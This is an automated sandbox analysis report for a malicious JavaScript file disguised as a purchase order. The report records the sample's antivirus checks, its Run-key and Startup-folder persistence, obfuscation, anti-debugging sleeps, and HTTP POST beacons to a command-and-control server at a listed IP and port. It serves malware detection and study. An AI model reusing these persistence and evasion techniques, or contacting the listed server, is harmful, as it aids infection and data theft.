Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0
Analysis ID:381804
Start time:14:00:17
Joe Sandbox Product:Cloud
Start date:03.10.2017
Overall analysis duration:0h 6m 38s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:12PO #927476.js
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:13
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • VBA Instrumentation enabled
  • JavaScript Instrumentation enabled
Detection:MAL
Classification:mal68.evad.troj.winJS@9/8@0/0
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information:Failed
Cookbook Comments:
  • Found application associated with file extension: .js
Warnings:
Show All
  • Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, WmiApSrv.exe, dllhost.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.


Detection

StrategyScoreRangeReportingDetection
Threshold680 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Signature Overview

Click to jump to signature section


AV Detection:

barindex
JavaScript source code contains functionality to check for AV productsShow sources
Source: 12PO #927476.jsArgument value : ['"AntiVirusProduct"']Go to definition
Source: 12PO #927476.jsReturn value : ['"AntiVirusProduct"']Go to definition
Source: 12PO #927476.jsArgument value : ['"AntiVirusProduct"']Go to definition

Software Vulnerabilities:

barindex
JavaScript source code contains functionality to generate code involving a shell, file or streamShow sources
Source: 12PO #927476.jsReturn value : ['"Shell.Application"', '"Scripting.FileSystemObject"', '"WScript.Shell"']Go to definition
Source: 12PO #927476.jsReturn value : ['"Shell.Application"', '"Scripting.FileSystemObject"', '"WScript.Shell"']Go to definition
Source: 12PO #927476.jsReturn value : ['"Shell.Application"', '"Scripting.FileSystemObject"', '"WScript.Shell"']Go to definition
Source: 12PO #927476.jsReturn value : ['"Shell.Application"', '"Scripting.FileSystemObject"', '"WScript.Shell"']Go to definition

Networking:

barindex
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /Vre HTTP/1.1Accept: */*Accept-Language: en-USUser-Agent: vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE\Accept-Encoding: gzip, deflateHost: 63.141.242.245:7974Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Urls found in memory or binary dataShow sources
Source: wscript.exeString found in binary or memory: http://63.141.242.245:7974/3
Source: wscript.exeString found in binary or memory: http://63.141.242.245:7974/4y#
Source: wscript.exeString found in binary or memory: http://63.141.242.245:7974/pr
Source: wscript.exeString found in binary or memory: http://63.141.242.245:7974/vre
Source: wscript.exeString found in binary or memory: http://63.141.242.245:7974/vre&
Source: wscript.exeString found in binary or memory: http://63.141.242.245:7974/vre9
Source: wscript.exeString found in binary or memory: http://63.141.242.245:7974/vre:
Source: wscript.exeString found in binary or memory: http://63.141.242.245:7974/vret
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.81:49163 -> 63.141.242.245:7974
JavaScript source code contains functionality to generate code involving HTTP requests or file downloadsShow sources
Source: 12PO #927476.jsArgument value : ['"http://63.141.242.245:7974/Vre"', '"http://63.141.242.245:7974/","Vre"']Go to definition
Source: 12PO #927476.jsReturn value : ['"Microsoft.XMLHTTP"']Go to definition
Source: 12PO #927476.jsReturn value : ['"Microsoft.XMLHTTP"']Go to definition
Source: 12PO #927476.jsReturn value : ['"User-Agent:"', '"User-Agent:","vjw0rm_7C2D4D8F\\computer\\user\\Microsoft Windows 7 Professional \\undefined\\\\YES\\']Go to definition
Source: 12PO #927476.jsReturn value : ['"http://63.141.242.245:7974/Vre"', '"POST","http://63.141.242.245:7974/Vre",false', '"open"', '"http://63.141.242.245:7974/"', '"POST"', '"http://63.141.242.245:7974/","Vre"']Go to definition
Source: 12PO #927476.jsReturn value : ['"Microsoft.XMLHTTP"']Go to definition
Source: 12PO #927476.jsReturn value : ['"send"']Go to definition
Source: 12PO #927476.jsReturn value : ['"Microsoft.XMLHTTP"']Go to definition
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 7974
Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 7974
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 7974

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run JUHZ3GDTCR
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run JUHZ3GDTCR
Creates a start menu entry (Start Menu\Programs\Startup)Show sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
Stores files to the Windows start menu directoryShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js\:Zone.Identifier:$DATA
Drops script or batch files to the startup folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup)Show sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js

Data Obfuscation:

barindex
JavaScript source code contains large arrays or strings with random content potentially encoding malicious codeShow sources
Source: 12PO #927476.jsString : entropy: 6.04, length: 262, content: '\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x5Go to definition
Source: 12PO #927476.jsArray : entropy: 5.42, length: 133, content: '\x43\x33\x6e\x44\x69\x43\x68\x72\x4b\x48\x70\x56\x49\x63\x4b\x59''\x77\x70\x66\x44\x6a\x44\x7a\x44\Go to definition

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft

System Summary:

barindex
Binary contains paths to debug symbolsShow sources
Source: Binary string: wscript.pdb source: wscript.exe
Source: Binary string: scrrun.pdb source: wscript.exe
Source: Binary string: wscript.pdbN source: wscript.exe
Classification labelShow sources
Source: classification engineClassification label: mal68.evad.troj.winJS@9/8@0/0
Creates files inside the user directoryShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user~1\AppData\Local\Temp\12PO #927476.js
Launches a second explorer.exe instanceShow sources
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Reads ini filesShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\12PO #927476.js'
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe 'C:\Users\user~1\AppData\Local\Temp\12PO #927476.js'
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\12PO #927476.js'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js'
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\12PO #927476.js'
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js'
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: 12PO #927476.jsInitial sample: Strings found which are bigger than 50
Reads the hosts fileShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: wscript.exeBinary or memory string: Progman
Source: wscript.exeBinary or memory string: Program Manager
Source: wscript.exeBinary or memory string: Shell_TrayWnd

Anti Debugging:

barindex
Checks for debuggers (devices)Show sources
Source: C:\Windows\explorer.exeFile opened: C:\Windows\WinSxS\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\wscript.exeSystem information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\wscript.exe TID: 3412Thread sleep time: -420000s >= -60s
Source: C:\Windows\explorer.exe TID: 3564Thread sleep time: -60000s >= -60s
Source: C:\Windows\explorer.exe TID: 3592Thread sleep time: -60000s >= -60s
Source: C:\Windows\explorer.exe TID: 3592Thread sleep time: -60000s >= -60s
Source: C:\Windows\explorer.exe TID: 3608Thread sleep time: -60000s >= -60s
Source: C:\Windows\explorer.exe TID: 3648Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3696Thread sleep time: -1020000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3696Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3728Thread sleep time: -840000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3728Thread sleep time: -60000s >= -60s
JavaScript source code contains functionality to check for volume informationShow sources
Source: 12PO #927476.jsReturn value : ['"volumeserialnumber"']Go to definition

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 7974
Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 7974
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 7974

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)Show sources
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 381804 Sample:  12PO #927476.js Startdate:  03/10/2017 Architecture:  WINDOWS Score:  68 1reduced Processes exeeded maximum capacity for this level. 2 processes have been hidden. main->1reduced      started     1 wscript.exe 2 19 main->1      started     5 explorer.exe 2 main->5      started     6 explorer.exe main->6      started     7171sig Drops script or batch files to the startup folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup) 7177sig Drops script or batch files to the startup folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup) 7178sig Drops script or batch files to the startup folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup) 1->7171sig 7 wscript.exe 16 5->7      started     8 wscript.exe 16 6->8      started     7->7177sig 8->7178sig process1 signatures1 process7 signatures7 fileCreated1 fileCreated7

Simulations

Behavior and APIs

TimeTypeDescription
14:01:04API Interceptor462x Sleep call for process: wscript.exe modified from: 60000ms to: 500ms
14:01:10API Interceptor5x Sleep call for process: explorer.exe modified from: 60000ms to: 500ms
14:01:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run JUHZ3GDTCR "C:\Users\user~1\AppData\Local\Temp\12PO #927476.js"
14:01:10AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshot